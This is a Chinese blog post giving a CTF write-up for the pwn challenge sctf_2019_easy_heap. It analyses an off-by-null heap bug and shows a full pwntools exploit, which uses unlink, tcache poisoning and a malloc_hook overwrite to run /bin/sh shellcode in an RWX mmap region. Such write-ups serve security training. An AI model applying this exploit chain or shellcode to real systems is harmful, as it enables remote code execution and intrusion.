sctf_2019_easy_heap

于 2023-09-10 13:26:00 发布
阅读量148 收藏
点赞数
分类专栏: Buuoj刷题 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_62887641/article/details/132790160
版权

sctf_2019_easy_heap

Arch:     amd64-64-little
RELRO:    Full RELRO
Stack:    Canary found
NX:       NX enabled
PIE:      PIE enabled

64位保护全开,本题是一道off by null

int ADD()
{
  unsigned int i; // [rsp+Ch] [rbp-14h]
  void *v2; // [rsp+10h] [rbp-10h]
  unsigned __int64 size; // [rsp+18h] [rbp-8h]

  for ( i = 0; BSSPTR[2 * i + 1]; ++i )
    ;
  if ( i > 0xF )
    return puts("No more space.");
  printf("Size: ");
  size = READ();
  if ( size > 0x1000 )
    return puts("Invalid size!");
  v2 = malloc(size);
  if ( !v2 )
  {
    perror("Memory allocate failed!");
    exit(-1);
  }
  BSSPTR[2 * i + 1] = v2;
  BSSPTR[2 * i] = size;
  ++dword_202040[0];
  return printf("chunk at [%d] Pointer Address %p\n", i, &BSSPTR[2 * i + 1]);
}

申请size大小不超过0x1000,可以超过tcache的size

int DELE()
{
  _DWORD *v0; // rax
  unsigned int v2; // [rsp+Ch] [rbp-4h]

  printf("Index: ");
  v2 = READ();
  if ( v2 <= 0xF && *((_QWORD *)&BSSPTR + 2 * v2 + 1) )
  {
    free(*((void **)&BSSPTR + 2 * v2 + 1));
    *((_QWORD *)&BSSPTR + 2 * v2 + 1) = 0LL;
    *((_QWORD *)&BSSPTR + 2 * v2) = 0LL;
    v0 = dword_202040;
    --dword_202040[0];
  }
  else
  {
    LODWORD(v0) = puts("Invalid index.");
  }
  return (int)v0;
}

没有uaf

int EDIT()
{
  unsigned int v1; // [rsp+4h] [rbp-Ch]

  printf("Index: ");
  v1 = READ();
  if ( v1 > 0xF || !BSSPTR[2 * v1 + 1] )
    return puts("Invalid index.");
  printf("Content: ");
  return READ_(BSSPTR[2 * v1 + 1], BSSPTR[2 * v1]);
}

edit这里没什么主要是READ_

unsigned __int64 __fastcall sub_E2D(__int64 a1, unsigned __int64 a2)
{
  char buf; // [rsp+13h] [rbp-Dh] BYREF
  int i; // [rsp+14h] [rbp-Ch]
  unsigned __int64 v5; // [rsp+18h] [rbp-8h]

  v5 = __readfsqword(0x28u);
  for ( i = 0; i < a2; ++i )
  {
    if ( read(0, &buf, 1uLL) <= 0 )
    {
      perror("Read failed!\n");
      exit(-1);
    }
    if ( buf == 10 )
      break;
    *(_BYTE *)(a1 + i) = buf;
  }
  if ( i == a2 )
    *(_BYTE *)(i + a1) = 0;					//off by null
  return __readfsqword(0x28u) ^ v5;
}

在最后那里存在off by null ,可以溢出一个\x00

本题没有show,但是有个很重要的地方

unsigned __int64 MAP()
{
  int fd; // [rsp+4h] [rbp-1Ch]
  unsigned __int64 buf; // [rsp+8h] [rbp-18h] BYREF
  void *v3; // [rsp+10h] [rbp-10h]
  unsigned __int64 v4; // [rsp+18h] [rbp-8h]

  v4 = __readfsqword(0x28u);
  setvbuf(stdin, 0LL, 2, 0LL);
  setvbuf(stdout, 0LL, 2, 0LL);
  setvbuf(stderr, 0LL, 2, 0LL);
  memset(&BSSPTR, 0, 0x80uLL);
  fd = open("/dev/urandom", 0);
  buf = 0LL;
  read(fd, &buf, 5uLL);
  buf &= 0xFFFFFFF000uLL;
  close(fd);
  v3 = mmap((void *)buf, 0x1000uLL, 7, 34, -1, 0LL);
  printf("Mmap: %p\n", v3);
  dword_202040 = 0;
  sub_CBD();
  return __readfsqword(0x28u) ^ v4;
}

这里,开辟了一个7权限的栈,并且给出了栈地址,

思路

写shellcode到可执行栈,然后通过malloc_hook或者free_hook执行栈,getshell

首先我们申请一个大于tcache的size值,然后我们再申请两个小的chunk,并且要不同大小,用来链上malloc_hook和执行栈的地址

然后通过unlink,把堆合并起来,再利用tcache的指针,修改我们想要的地址,

最后通过malloc_hook–>栈地址–>shellcode

pl=p64(0)*2+p64(0x470)
#chunk合并
edit(2,pl)
dele(3)
dele(1)
dele(2)

为什么要free掉1和2chunk,主要是放到tcache里面
在这里插入图片描述

add(0x440)#0
#这里是2号堆的位置也就是将tcache指针指向main_arena+96的位置,方便之后改成hook
#至于为什么改成malloc_hook,因为main_arena+96跟malloc_hook只相差一个字节,改的少,不需要爆破
add(0x510)#1
pl=b'a'*0x410+p64(0)+p64(0x31)+p64(map+0x100)
#恢复1号堆的位置也就是将tcache指针指向栈地址
edit(0,pl)

在这里插入图片描述

后面就是正常申请和shellcode写入栈

完整exp

from pwn import*
from Yapack import *
libc=ELF('libc-2.27.so')

context(os='linux', arch='amd64',log_level='debug')
r,elf=rec("node4.buuoj.cn",27399,"./pwn",0)

ru("ap: 0x")
map=int(r.recv(10),16)
li(map)
a1=add(0x410)#0
add(0x28)#1
add(0x18)#2
add(0x4f0)#3
add(0x10)#4
dele(0)
pl=p64(0)*2+p64(0x470)
#chunk合并
edit(2,pl)
dele(3)
dele(1)
dele(2)
add(0x440)#0
add(0x510)#1
pl=b'a'*0x410+p64(0)+p64(0x31)+p64(map+0x100)
edit(0,pl)
add(0x28)#2
add(0x28)#3 map
sc=b"\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x6a\x3b\x58\x99\x0f\x05"
edit(3,sc)
edit(1,p8(0x30))
add(0x18)#5
add(0x18)#6
edit(6,p64(map+0x100))

sla(b'>> ',b'1')
sla(b": ",b"0")
ia()

在这里插入图片描述

YameMres
关注
专栏目录
java版sm4源码-SCTF2019-Write-Up:SCTF2019报道
06-04
SCTF 2019 官方 Write-Up Misc 签到 出题人: XXX 解题人数: 260 最终分数:71 [removed]/9j/4QBkRXhpZgAATU0AKgAAAAgABYdp... 给了个图片的base64编码,某些浏览器可能渲染会截断,本来想放hint提示浏览器问题,但是...
Buuoj sctf_2019_easy_heap
u014377094的博客
03-12 654
大佬博客传送门:sctf_2019_easy_heap - LynneHuan - 博客园 (cnblogs.com) 知识更新: 1.你需要了解一下off-by-one,unlink,overlapping是啥 传送门在这里:堆中的 Off-By-One - CTF Wiki (ctf-wiki.org) 2.了解一下chunk 空间的共用情况,也就是下一个的 chunk 的 prev_size 域给当前 chunk 当做数据域使用,这 种情况只出现在 malloc 的大小为 8 的奇数倍(32
BUUCTF:sctf_2019_easy_heap
weixin_51055545的博客
01-04 1360
例行检查一下程序: 64位的一道堆题,放到IDA中看下: 首先看到一个菜单:
sctf_2019_easy_heap(off by null,unlink造成doublefree)
m0_51251108的博客
11-18 455
sctf_2019_easy_heap: 保护全开 程序分析: 给我们mmap了一段可读可写可执行的区域,还告诉了我们地址 add里告诉了我们堆地址 其他都挺常规的,delete也释放干净了 漏洞分析: 有个off by null 利用思路: 1.利用漏洞off-by-null造成unlink合并,再申请回来,指针数组里就有两个指针指向同一块地方,我们delete两次就造成了doublefree 2.我们用doublefree往mmap的地方写shellcode 3.再用off-by-null造成unl
BUUCTF-PWN刷题记录-14
weixin_44145820的博客
04-29 804
目录sctf_2019_easy_heap(块重叠,double free) sctf_2019_easy_heap(块重叠,double free) 这题原题目好像是在Ubuntu16下的,但是BUU上面是Ubuntu18,所以应该更简单一点 总的来说,这题应该是ciscn_2019_final_3的加强版吧,当然也有更简单的地方 首先,给了我们一块rwx的空间 add函数会给你conten...
SCTF2020:SCTF2020
04-01
SCTF2020:一场聚焦Java技术的网络安全挑战】 SCTF2020,全称为“SCTF2020网络安全技术挑战赛”,是一个专注于信息技术安全领域的年度竞赛,尤其强调了Java技术的应用。这个比赛旨在检验参赛者在Java编程、网络...
spn.rar_SSTF
09-23
- 主程序部分,用于调用SCTF算法并输出结果。 **pudn.txt文本说明:** `pudn.txt`文件可能是实验指导或者说明文档,可能包含了实验目的、步骤、预期结果等内容。为了更好地理解SSTF算法的实验,你需要阅读此文件,...
安恒杯pwn1
04-25
"安恒杯pwn1" 本文主要讨论的是安恒杯pwn1题目的解决方法。该题目是一个Pwn题目,利用了strcpy函数的栈溢出漏洞来获取shell。 首先,我们需要了解题目的基本信息。题目中提供了一个可执行文件pwn1,运行起来后显示...
SEBA\SCTF-DL3手册(英语版)
12-02
根据给定的文件信息,我们可以深入探讨SEBA\SCTF-DL3流量计的手册,了解其技术规格、功能及应用。以下是对标题、描述、标签以及部分内容的详细解析: ### 1. 通用规格 SEBA\SCTF-DL3是一款由韩国SEBA公司生产的...
buuctf [ZJCTF 2019]EasyHeap
weixin_45677731的博客
08-24 951
这题只有add,edit,delete三个主体部分,没有show的部分 create_heap函数,chunk的指针保存在bss段的heaparray数组处 edit_heap函数,注意这里输入的数据长度是可以自己设置的,就可以随意溢出了 delete_heap函数 除此之外,还有这样一个l33t函数: 在程序中,你只要满足一定的条件,是可以运行这个函数的,我猜测在[ZJCTF 2019]比赛进行的时候可能这个函数是可以利用的,但现在在buu上面是用不了的,flag文件的目录不对。不过,这个sys
复建1:sctf_2019_easy_heap
qq_51627915的博客
06-17 169
这其实是复建的第二题,因为第一题涉及的知识点太多,就不想写wp了,太费时间。
buuctf_roarctf_2019_easyheap离谱的一题
qq_43766802的博客
09-29 653
首先例行公事,用checksec检查一下函数的保护措施,发现除了pie保护全开,但此题不需要泄漏程序加载地址,是个好事 查看一下函数逻辑,程序一开始我们可以向内存区域的某一块输入数据,接下来就是heap的经典菜单栏,add函数允许我们创建任意大小的buf,但只有一个指针,free时没有删除指针,可以double free,当我们输入666时程序允许我们添加和free一个大小固定的chunk给ptr,这个ptr其实没什么用,主要用来给自定义大小的buf double free做道具用,show函数只有当
BUUCTF-PWN roarctf_2019_easyheap(double free, stdout重定向)
weixin_44145820的博客
04-23 787
这里写目录标题题目分析漏洞利用Exp 题目分析 有添加,删除,展示三个主要功能,不过添加有次数限制,同时限制了申请大小,使得我们不能申请出unsorted bin范围内的chunk 删除之后没有置空,可以多次free show功能有条件限制,而且会把stdout关了 添加和后门的次数 后门函数可以进行calloc和free,同样没有置空,但是后门函数的次数限制逻辑有问题,即使为0还会再...
SCTF-2019 Misc wp
热门推荐
Nius
06-23 2万+
SCTF-2019 MISC 签到题 题目中说’cat \flag ’ in data:image/jpeg;base64,/9j/4QBkRXhpZgAATU0AKgAAAAgABYdpAAQAAAABAAAASgESAAQAAAABAAAAAAEBAAMAAAABAa4AAAEyAAIAAAABAAAAAAEAAAMAAAABAa4AAAAAAAAAAZIIAAQAAAABAAAAAAAA...
sctf_2019_easy_heap off-by-null劫持IO_FILE,理解 0ctf2015 free_note unsortedbin-double_free使用
weixin_46521144的博客
08-14 345
分析以及漏洞点 本身off-by-null没什么可以再说的,但是这道题没有show函数,就必须想到要劫持IO_FILE。但是之前就一直有个问题就是既然unsortedbin中地址无法取出,怎么能写到tcache或者fastbin中?之前许多题目因为正好有类似的漏洞,但感觉不是很普世。这次只有一个off-by-null就实现了这一点,因此看完之后恍然大悟。明白了一般性的劫持IO_FILE泄露libc的方法。 关键点:构造chunk overlapping,之后用一个大的unsortedbin包裹住这个chun
【Pwn】NCTF2019 easy_heap
Nothing
11-29 572
查看程序保护。 分析程序,漏洞在free之后指针没置0,导致uaf;堆的分配大小做了限制0x50该变量在bss段上,刚好bss段上存放了用户名信息,所以先考虑在bss上伪造堆块,进行一次fastbinattack,分配到bss段,修改限制大小,去掉限制之后就是常规操作了,unsortbin泄露libc,再进行一次fastbinattack,getshell。 from pwn import * ...
buuoj Pwn writeup 146-150
yongbaoii的博客
05-28 234
146 SWPUCTF_2019_login 147 qctf2018_stack2 148 lctf2016_pwn200 149 sctf_2019_easy_heap 150 ciscn_2019_s_1
./pwn1_sctf_2016: error while loading shared libraries: libstdc++.so.6: cannot open shared object file: No such file or directory
最新发布
09-02
这个错误通常发生在缺少 libstdc++.so.6 库文件时。解决这个问题的方法是安装 libstdc++ 库。你可以尝试使用以下命令来安装它: 对于 Ubuntu 或 Debian 系统: ``` sudo apt-get install libstdc++6 ``` 对于 CentOS 或 RHEL 系统: ``` sudo yum install libstdc++.so.6 ``` 请注意,根据你使用的操作系统和软件包管理器,命令可能会有所不同。确保你的系统上已经安装了适当的软件包管理器,并根据你的情况进行相应的调整。如果问题仍然存在,请提供更多的上下文信息,以便我可以提供更具体的解决方案。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值